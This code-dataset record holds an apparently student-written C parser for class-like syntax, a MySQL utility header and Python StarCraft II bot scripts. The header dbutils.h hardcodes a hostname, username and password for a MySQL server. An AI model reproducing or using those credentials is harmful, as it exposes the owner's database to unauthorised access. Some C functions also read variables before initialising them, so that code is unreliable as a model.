*/\n\t\tif(strcmp(name, keywords[i]) == 0)\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\n\t\ti++;\n\t}\n\n\treturn 1;\n}\n\nchar getTypeID(Vector* tokens, int pos)\n{\n\tint i;\n\tint startPos;\n\n\n\t/* there are three stages to this check; we need to check in the following order:\n\t * 1-\tcheck local vars and parameters\n\t * 2-\tcheck global vars\n\t *\n\t * note that class variable were not included. This is because we should have\n\t * already called addThisRef and addThisArg prior to invoking this function. This\n\t * would cause all class variables to be prepended with \"this->\"\n\t */\n\n\t/* loop backwards, looking for a variable declaration. */\n\n\t/* gets the starting position of the program. 
*/\n\tfor(i = pos; i >= 0; i--)\n\t{\n\t\tif(isFunction(tokens, i))\n\t\t{\n\t\t\tstartPos = i;\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tfor(i = startPos + 1; i <= pos; i++)\n\t{\n\t\t/* \"if we found a variable declaration, and it matches our given variable name\" */\n\t\tif(strcmp(tokens->contents[i], tokens->contents[pos]) == 0 && isVariable(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint multipleDeclaration;\n\t\t\tfor(j = i - 1; j >= 0; j--)\n\t\t\t{\n\t\t\t\tif(isValidType(tokens->contents[j]) == 1)\n\t\t\t\t{\n\t\t\t\t\t/* return the first character of the current type identifier. */\n\t\t\t\t\treturn ((char*) tokens->contents[j])[0];\n\t\t\t\t}\n\t\t\t\telse if(isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\tif(multipleDeclaration == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\treturn 's';\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* this means we have found a situation like int a,b; */\n\t\t\t\telse if(strcmp(tokens->contents[j], \",\") == 0)\n\t\t\t\t{\n\t\t\t\t\tmultipleDeclaration = 1;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]) && strcmp(tokens->contents[j], \"*\") != 0)\n\t\t\t\t{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t\t/* if we find a comma, check the type of the name behind us!!! */\n\t\t\t}\n\t\t}\n\t\t/* this block executing signifies that the function that we are in has been located */\n\t\telse if(isFunction(tokens, i))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\n\t/* now we have to essentially make sure we find global variables. */\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\t/* \"if we found a variable declaration, and it matches our given variable name\" */\n\t\tif(strcmp(tokens->contents[i], tokens->contents[pos]) == 0 && isVariable(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint multipleDeclaration;\n\t\t\tfor(j = i - 1; j >= 0; j--)\n\t\t\t{\n\t\t\t\tif(isValidType(tokens->contents[j]) == 1)\n\t\t\t\t{\n\t\t\t\t\t/* return the first character of the current type identifier. 
*/\n\t\t\t\t\treturn ((char*) tokens->contents[j])[0];\n\t\t\t\t}\n\t\t\t\telse if(isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\tif(multipleDeclaration == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\treturn 's';\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* this means we have found a situation like int a,b; */\n\t\t\t\telse if(strcmp(tokens->contents[j], \",\") == 0)\n\t\t\t\t{\n\t\t\t\t\tmultipleDeclaration = 1;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]))\n\t\t\t\t{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t\t/* if we find a comma, check the type of the name behind us!!! */\n\t\t\t}\n\t\t}\n\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn '\\0';\n}\n\nchar* getType(Vector* tokens, int pos)\n{\n\tint i;\n\tint startPos;\n\n\t/* gets the starting position of the program. */\n\tfor(i = pos; i >= 0; i--)\n\t{\n\t\tif(isFunction(tokens, i))\n\t\t{\n\t\t\tstartPos = i;\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tfor(i = startPos + 1; i <= pos; i++)\n\t{\n\t\t/* \"if we found a variable declaration, and it matches our given variable name\" */\n\t\tif(strcmp(tokens->contents[i], tokens->contents[pos]) == 0 && isVariable(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint multipleDeclaration;\n\n\t\t\tmultipleDeclaration = 0;\n\t\t\tfor(j = i - 1; j >= 0; j--)\n\t\t\t{\n\t\t\t\tif(isValidType(tokens->contents[j]) == 1)\n\t\t\t\t{\n\t\t\t\t\tchar* str;\n\n\t\t\t\t\tstr = malloc(sizeof(char) * strlen(tokens->contents[j]) + 1);\n\t\t\t\t\tstrcpy(str, tokens->contents[j]);\n\t\t\t\t\t/* return the first character of the current type identifier. 
*/\n\t\t\t\t\treturn str;\n\t\t\t\t}\n\t\t\t\telse if(isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\tif(multipleDeclaration == 0)\n\t\t\t\t\t{\t\n\t\t\t\t\t\tchar* str;\n\t\t\t\t\t\tstr = malloc(sizeof(char) * strlen(tokens->contents[j]) + 1);\n\t\t\t\t\t\tstrcpy(str, tokens->contents[j]);\n\t\t\t\t\t\treturn str;\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tmultipleDeclaration = 0;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* this means we have found a situation like int a,b; */\n\t\t\t\telse if(strcmp(tokens->contents[j], \",\") == 0)\n\t\t\t\t{\n\t\t\t\t\tmultipleDeclaration = 1;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]) && strcmp(tokens->contents[j], \"*\") != 0)\n\t\t\t\t{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t\t/* if we find a comma, check the type of the name behind us!!! */\n\t\t\t}\n\t\t}\n\t\t/* this block executing signifies that the function that we are in has been located */\n\t\telse if(isFunction(tokens, i))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\n\t/* now we have to essentially make sure we find global variables. */\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\t/* \"if we found a variable declaration, and it matches our given variable name\" */\n\t\tif(strcmp(tokens->contents[i], tokens->contents[pos]) == 0 && isVariable(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint multipleDeclaration;\n\n\t\t\tmultipleDeclaration = 0;\n\t\t\tfor(j = i - 1; j >= 0; j--)\n\t\t\t{\n\t\t\t\tif(isValidType(tokens->contents[j]) == 1)\n\t\t\t\t{\n\t\t\t\t\tchar* str;\n\n\t\t\t\t\tstr = malloc(sizeof(char) * strlen(tokens->contents[j]) + 1);\n\t\t\t\t\tstrcpy(str, tokens->contents[j]);\n\t\t\t\t\t/* return the first character of the current type identifier. 
*/\n\t\t\t\t\treturn str;\n\t\t\t\t}\n\t\t\t\telse if(isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\tif(multipleDeclaration == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tchar* str;\n\t\t\t\t\t\tstr = malloc(sizeof(char) * strlen(tokens->contents[j]) + 1);\n\t\t\t\t\t\tstrcpy(str, tokens->contents[j]);\n\t\t\t\t\t\treturn str;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* this means we have found a situation like int a,b; */\n\t\t\t\telse if(strcmp(tokens->contents[j], \",\") == 0)\n\t\t\t\t{\n\t\t\t\t\tmultipleDeclaration = 1;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]))\n\t\t\t\t{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t\t/* if we find a comma, check the type of the name behind us!!! */\n\t\t\t}\n\t\t}\n\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn NULL;\n}\n\nint isValidType(char* type)\n{\n\tconst char* validAtomics[] = {\"auto\",\"char\",\"double\",\"float\",\"int\",\"long\",\"short\",\"void\",NULL};\n\tconst char* validPrefixes[] = {\"const\",\"extern\",\"register\",\"signed\",\"static\",\"struct\",\"union\",\"unsigned\",\"volatile\",NULL};\n\n\tint i;\n\n\tif(type == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\ti = 0;\n\n\t/* check if valid atomic type. */\n\twhile(validAtomics[i] != NULL)\n\t{\n\t\tif(strcmp(type, validAtomics[i]) == 0)\n\t\t{\n\t\t\treturn 1;\n\t\t}\n\t\ti++;\n\t}\n\n\ti = 0;\n\n\t/* check if valid prefix, like struct, etc. */\n\twhile(validPrefixes[i] != NULL)\n\t{\n\t\tif(strcmp(type, validPrefixes[i]) == 0)\n\t\t{\n\t\t\treturn 2;\n\t\t}\n\t\ti++;\n\t}\n\n\t/* if the type was class, essentially. */\n\tif(strcmp(type, \"class\") == 0)\n\t{\n\t\treturn 3;\n\t}\n\n\treturn 0;\n}\n\nint isClass(Vector* tokens, int pos)\n{\n\tint i;\n\tint classPresent;\n\tint validName;\n\tint validSuffix;\n\n\tif(tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tif(pos < 0 || pos == tokens->length)\n\t{\n\t\treturn -1;\n\t}\n\n\t/* check for class preceeding this location. 
*/\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\t/* if our preceeding token is a valid type or valid struct name */\n\t\tif(strcmp(tokens->contents[i], \"class\") == 0)\n\t\t{\n\t\t\tclassPresent = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\t/* if the current token is a valid function name */\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tvalidName = 1;\n\t}\n\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\t/* if the next token is an open parenthesis */\n\t\tif(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t{\n\t\t\tvalidSuffix= 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(classPresent && validName && validSuffix)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\n/**\n *\tcases to consider here:\n *\t0\t- not a valid function declaration\n *\t1\t- <c return type> <functionName>(<args>)\n *\t2\t- <modifier> <c return type> <functionName>(<args>)\n *\t3\t- <stuct> <structName> <functionName>(<args>)\n *\t4\t- <class> <className> <functionName>(<args>)\n */\nint isFunction(Vector* tokens, int pos)\n{\n\tint i;\n\tint typePresent;\n\tint nameValid;\n\tint suffixValid;\n\n\ttypePresent = 0;\n\tnameValid = 0;\n\tsuffixValid = 0;\n\n\tif(tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\telse if(pos >= tokens->length || pos < 0)\n\t{\n\t\treturn -1;\n\t}\n\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(typePresent == 1)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\t/* if our preceeding token is a valid type or valid struct name */\n\t\tif(isValidType(tokens->contents[i]) || isValidName(tokens->contents[i]) || strstr(\",\",tokens->contents[i]) != NULL)\n\t\t{\n\t\t\ttypePresent = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]) && strcmp(tokens->contents[i], \"*\") != 0)\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\t/* if the current token is a valid function name 
*/\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tnameValid = 1;\n\t}\n\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\t/* if the next token is an open parenthesis */\n\t\tif(strcmp(tokens->contents[i], \"(\") == 0)\n\t\t{\n\t\t\tsuffixValid = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(typePresent && nameValid && suffixValid)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\nint isFunctionCall(Vector* tokens, int pos)\n{\n\tint i;\n\n\tint prevValid;\n\tint nameValid;\n\tint suffValid;\n\n\tprevValid = 0;\n\tnameValid = 0;\n\tsuffValid = 0;\n\n\tif(tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(!isValidType(tokens->contents[i]) && !isValidName(tokens->contents[i]) && !isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\tprevValid = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tnameValid = 1;\n\t}\n\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"(\") == 0)\n\t\t{\n\t\t\tsuffValid = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\tif(prevValid && nameValid && suffValid)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\nint isMemberFunctionCall(Vector* tokens, int pos)\n{\n\tint i;\n\n\tint periodPresent;\n\tint nameValid;\n\tint hasBrackets;\n\n\tperiodPresent = 0;\n\tnameValid = 0;\n\thasBrackets = 0;\n\n\t/* checks for the period preceeding the function call */\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(strcmp(tokens->contents[i], \".\") == 0)\n\t\t{\n\t\t\tperiodPresent = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tnameValid = 1;\n\t}\n\telse\n\t{\n\t\treturn 0;\n\t}\n\n\tfor(i = 
pos + 1; i < tokens->length; i++)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"(\") == 0)\n\t\t{\n\t\t\thasBrackets = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*) tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\treturn periodPresent && nameValid && hasBrackets;\t\n}\n\nint isFunctionPointer(Vector* tokens, int pos)\n{\n\tint i;\n\n\tint returnValid;\n\tint prevSyntax;\n\tint nameValid;\n\tint postSyntax;\n\tint hasBrackets;\n\n\treturnValid = 0;\n\tprevSyntax = 0;\n\tnameValid = 0;\n\tpostSyntax = 0;\n\thasBrackets = 0;\n\t\n\t\n\t/* looks for the (* syntax, and then tries to find the return type */\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(returnValid == 1)\n\t\t{\n\t\t\tbreak;\n\t\t}\t\n\n\t\t/* this finds the (* syntax that is needed (inserted by migrateFunctions) */\n\t\tif(strcmp(tokens->contents[i], \"(*\") == 0)\n\t\t{\n\t\t\tint j;\n\n\t\t\tprevSyntax = 1;\n\n\t\t\t/* loop backwards from the (* syntax to get the return type. */\n\t\t\tfor(j = i - 1; j >= 0; j--)\n\t\t\t{\n\t\t\t\tif(isValidType(tokens->contents[j]) || isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\treturnValid = 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\t/* ignore spaces and asterisks */\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]) && strcmp(tokens->contents[j], \"*\") != 0)\n\t\t\t\t{\n\t\t\t\t\treturn 0;\n\t\t\t\t}\n\n\t\t\t}\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\t/* if the current token is valid */\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tnameValid = 1;\n\t}\n\telse\n\t{\n\t\treturn 0;\n\t}\n\n\t/* checks for the following syntax */\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\tif(postSyntax == 1)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tif(strcmp(tokens->contents[i], \")\") == 0)\n\t\t{\n\t\t\tint j;\n\t\t\tpostSyntax = 1;\n\n\t\t\t/* loop after the closing brace that surrounds the function pointer name */\n\t\t\tfor(j = i + 1; j < tokens->length; 
j++)\n\t\t\t{\n\t\t\t\t/* this would represent the opening brace after the function pointer name */\n\t\t\t\tif(strcmp(tokens->contents[j], \"(\") == 0)\n\t\t\t\t{\n\t\t\t\t\thasBrackets = 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*) tokens->contents[j])[0]))\n\t\t\t\t{\n\t\t\t\t\treturn 0;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\t/* returning 1 only if all the conditions are true */\n\treturn returnValid && prevSyntax && nameValid && postSyntax && hasBrackets;\n}\n\nint beginsFunction(Vector* tokens, int pos)\n{\n\tint i;\n\n\tint typeValid;\n\tint nameValid;\n\tint parnValid;\n\tint index;\n\n\ttypeValid = 0;\n\tnameValid = 0;\n\tparnValid = 0;\n\ti = 0;\n\n\tindex = 0;\n\n\tif(isValidType(tokens->contents[pos]) == 1)\n\t{\n\t\tindex = pos + 1;\n\t\ttypeValid = 1;\n\t}\n\telse if(isValidType(tokens->contents[pos]) == 2)\n\t{\n\t\tfor(i = pos + 1; i < tokens->length; i++)\n\t\t{\n\t\t\tif(isValidName(tokens->contents[i]))\n\t\t\t{\n\t\t\t\tindex = i + 1;\n\t\t\t\ttypeValid = 1;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t\t{\n\t\t\t\treturn 0;\n\t\t\t}\n\t\t}\n\t}\n\telse if(isValidType(tokens->contents[pos]) == 3)\n\t{\n\t\t/* check for a valid class name */\n\t\tfor(i = pos + 1; i < tokens->length; i++)\n\t\t{\n\t\t\tif(isValidName(tokens->contents[i]))\n\t\t\t{\n\t\t\t\tindex = i + 1;\n\t\t\t\ttypeValid = 1;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t\t{\n\t\t\t\treturn 0;\n\t\t\t}\n\n\t\t}\n\t}\n\n\tfor(i = index; i < tokens->length; i++)\n\t{\n\t\t/* this would be the name of the function itself. 
*/\n\t\tif(isValidName(tokens->contents[i]))\n\t\t{\n\t\t\tnameValid = 1;\n\t\t\tindex = i + 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(strstr(\"*****\", tokens->contents[i]) != NULL)\n\t\t{\n\t\t\tint j;\n\t\t\tfor(j = i + 1; j < tokens->length; j++)\n\t\t\t{\n\t\t\t\t/* if we found a pointer (up to five levels), we need to find the name */\n\t\t\t\tif(isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\tnameValid = 1;\n\t\t\t\t\tindex = j + 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]))\n\t\t\t\t{\n\t\t\t\t\treturn 0;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\t/* search for the open parenthesis */\n\tfor(i = index; i < tokens->length; i ++)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"(\") == 0)\n\t\t{\n\t\t\tparnValid = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\treturn nameValid && typeValid && parnValid;\n}\n\nint isVariable(Vector* tokens, int pos)\n{\n\tint i;\n\n\tint typePresent;\n\tint nameValid;\n\tint suffixValid;\n\n\ttypePresent = 0;\n\tnameValid = 0;\n\tsuffixValid = 0;\n\n\n\tif(tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\telse if(pos >= tokens->length || pos < 0)\n\t{\n\t\treturn -1;\n\t}\n\n\t/* loop backwards until we find a variable type */\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(isValidType(tokens->contents[i]) || isValidName(tokens->contents[i]) )\n\t\t{\n\t\t\ttypePresent = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(strcmp(\",\", tokens->contents[i]) == 0)\n\t\t{\n\t\t\tcontinue;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]) && strcmp(tokens->contents[i], \"*\") != 0)\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tnameValid = 1;\n\t}\n\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\tif(strstr(\",;=[\", tokens->contents[i]) != NULL)\n\t\t{\n\t\t\tsuffixValid = 
1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(typePresent && nameValid && suffixValid)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\n/*\nint isVariableDeclaration(Vector* tokens, int pos)\n{\n\tint i;\n\n\tint typePreceeds;\n\tint nameValid;\n\tint semicolonFollows;\n\n\ttypePreceeds = 0;\n\tsemicolonFollows = 0;\n\n\tif(!isValidName(tokens->contents[pos]))\n\t{\n\t\treturn 0;\n\t}\n\n\tfor(i = pos - 1; i >= 0; i++)\n\t{\n\t\tif(isValidType(tokens->contents[i]))\n\t\t{\n\t\t\ttypePreceeds = 1;\n\t\t}\n\t\telse if(strstr(\"{;}=\", tokens->contents[i]) != NULL)\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(isValidName(nameValid))\n\t{\n\t\tnameValid = 1;\n\t}\n\telse\n\t{\n\t\treturn 0;\n\t}\n\n\tfor(i = pos + 1; i < tokens->pos; i++)\n\t{\n\t\tif(strcmp(tokens->contents[i]) == 0)\n\t\t{\n\n\t\t}\n\t\telse if()\n\t\t{\n\n\t\t}\n\t}\n\n\treturn typePreceeds && nameValid && semicolonFollows;\n}\n*/\n\nint isClassVariable(Vector* tokens, int pos)\n{\n\tint i;\n\tint classPresent;\n\tint classNamePresent;\n\tint nameValid;\n\tint isDecOrDef;\n\n\tclassPresent = 0;\n\tclassNamePresent = 0;\n\tnameValid = 0;\n\tisDecOrDef = 0;\n\n\t/* find the className. 
*/\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(classPresent == 1)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\tif(strcmp(tokens->contents[i], \"class\") == 0)\n\t\t{\n\t\t\tint j;\n\n\t\t\tfor(j = i + 1; j < pos; j++)\n\t\t\t{\n\t\t\t\tif(isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\tclassNamePresent = 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]))\n\t\t\t\t{\n\t\t\t\t\treturn 0;\n\t\t\t\t}\n\t\t\t}\n\t\t\tclassPresent = 1;\n\n\t\t}\n\t\t/* the only other accepted characters are spaces, variable/class names, and commas */\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]) && !isValidName(tokens->contents[i])&& strcmp(tokens->contents[i], \",\") != 0)\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tnameValid = 1;\n\t}\n\telse\n\t{\n\t\treturn 0;\n\t}\n\n\t/* now we are searching for the semicolon. we will ignore commas and valid names. */\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\t/* checks if tokens->contents[i] is contained within ;= */\n\t\tif(strstr(\";=\",tokens->contents[i]) != NULL)\n\t\t{\n\t\t\tisDecOrDef = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]) && !isValidName(tokens->contents[i]) && strcmp(tokens->contents[i], \",\") != 0)\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\n\t}\n\n\treturn classPresent && classNamePresent && nameValid && isDecOrDef;\n}\n" }, { "alpha_fraction": 0.6113585829734802, "alphanum_fraction": 0.6146993041038513, "avg_line_length": 10.946666717529297, "blob_id": "7b4c9f774c0bf1a2b7c6a0c0e117714700c2e68a", "content_id": "aac95f557aba14a62048f95a515a47cea85f6b34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 898, "license_type": "no_license", "max_line_length": 75, "num_lines": 75, "path": "/dbutils.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "\n\n#ifndef __GSOVERNIGO_DBUTILS_H__\n#define 
__GSOVERNIGO_DBUTILS_H__\n\n#include <mysql/mysql.h>\n\n#define QUERY_MAX 512\n\n#define HOSTNAME \"dursley.socs.uoguelph.ca\"\n#define USERNAME \"gsoverni\"\n#define PASSWORD \"0948924\"\n#define DATABASE \"gsoverni\"\n\n\n/**\n *\n */\nint mysql_startConnect(MYSQL* sql);\n\n/**\n *\n */\nint mysql_make(MYSQL* sql);\n\n/**\n *\n */\nint mysql_clear(MYSQL* sql);\n\n/**\n *\n */\nint mysql_reset(MYSQL* sql);\n\n/**\n *\n */\nint mysql_posts(MYSQL* sql);\n\n/**\n *\n */\nint mysql_users(MYSQL* sql);\n\n/**\n *\n */\nint mysql_streams(MYSQL* sql);\n\n/**\n *\n */\nint getLastRead(char* username, char* stream, MYSQL* sql);\n\n/**\n *\n */\nint setLastRead(char* username, char* stream, int n, MYSQL* sql);\n\n/**\n *\n */\nint numposts(char* stream, MYSQL* sql);\n\n/**\n *\n */\nint getPostN(char* username, char* stream, char* order, int n, MYSQL* sql);\n\n/**\n *\n */\nint getStreams(char* username, MYSQL* sql);\n\n\n#endif\n" } ]
30
arjunsv/sc2-deepmind-ai
https://github.com/arjunsv/sc2-deepmind-ai
44f0cccc889c4be32287e80dc4c6d21677a9a59e
2baa1ed62182b9e79e7927d28a03ee91c5507be3
c497ee17c6dff1c452bb7a99b6e7d92b65d689fc
refs/heads/master
2020-03-21T08:07:09.272791
2018-07-16T00:32:19
2018-07-16T00:32:19
138,321,659
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6350559592247009, "alphanum_fraction": 0.6409163475036621, "avg_line_length": 37.32653045654297, "blob_id": "e5cb9b9b31e54fb9fe4c996e0f5a05c470f5a379", "content_id": "8a159839f2ce7bdba4ad47acb97f8ed45ba71a1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1877, "license_type": "no_license", "max_line_length": 97, "num_lines": 49, "path": "/Proxy2Gate.py", "repo_name": "arjunsv/sc2-deepmind-ai", "src_encoding": "UTF-8", "text": "import sc2\nimport random\nfrom sc2 import run_game, maps, Race, Difficulty\nfrom sc2.player import Bot, Computer\nfrom sc2.constants import NEXUS, PROBE, PYLON, GATEWAY\n\nclass Proxy2GateBot(sc2.BotAI):\n def __init__(self):\n self.proxy_location_reached = False\n self.proxy_pylon_built = False\n self.proxy_gateways_built = False\n \n\n async def on_step(self, iteration):\n if not self.proxy_pylon_built:\n await self.distribute_workers()\n\n self.proxy_location = self.game_info.map_center.towards(self.enemy_start_locations[0], 5)\n\n if not self.proxy_location_reached:\n worker = self.select_build_worker(self.proxy_location)\n await self.do(worker.move(self.proxy_location))\n self.proxy_location_reached = True\n\n if self.proxy_location_reached and self.can_afford(PYLON) and not self.proxy_pylon_built:\n await self.build(PYLON, near=self.proxy_location)\n self.proxy_pylon_built = True\n\n if self.units(PYLON).ready.amount >= 1 and not self.proxy_gateways_built:\n await self.build(GATEWAY, near=self.proxy_location)\n await self.build(GATEWAY, near=self.proxy_location)\n self.proxy_gateways_built = True\n\n async def build_workers(self):\n for nexus in self.units(NEXUS).ready.noqueue:\n if self.can_afford(PROBE):\n await self.do(nexus.train(PROBE))\n\n async def build_pylon(self):\n if self.supply_left < 5 and not self.already_pending(PYLON):\n nexuses = self.units(NEXUS).ready\n if nexuses.exists:\n if self.can_afford(PYLON):\n await self.build(PYLON, 
near=nexuses.first)\n\nrun_game(maps.get(\"AbyssalReefLE\"), [\n Bot(Race.Protoss, Proxy2GateBot()),\n Computer(Race.Zerg, Difficulty.Easy)\n ], realtime=True)" }, { "alpha_fraction": 0.5651703476905823, "alphanum_fraction": 0.5839192271232605, "avg_line_length": 38.34751892089844, "blob_id": "2e2b74763f35ae97ce01c667ad1962718b10a186", "content_id": "4a2b54e6f5e0498e28e08bb6343ddf1f4048271b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5547, "license_type": "no_license", "max_line_length": 119, "num_lines": 141, "path": "/ArjBot.py", "repo_name": "arjunsv/sc2-deepmind-ai", "src_encoding": "UTF-8", "text": "import sc2\nimport random\nimport cv2\nimport numpy as np\nfrom sc2 import run_game, maps, Race, Difficulty\nfrom sc2.player import Bot, Computer\nfrom sc2.constants import NEXUS, PROBE, PYLON, ASSIMILATOR, GATEWAY, \\\n CYBERNETICSCORE, STALKER, STARGATE, VOIDRAY\n\nclass ArjBot(sc2.BotAI):\n def __init__(self):\n 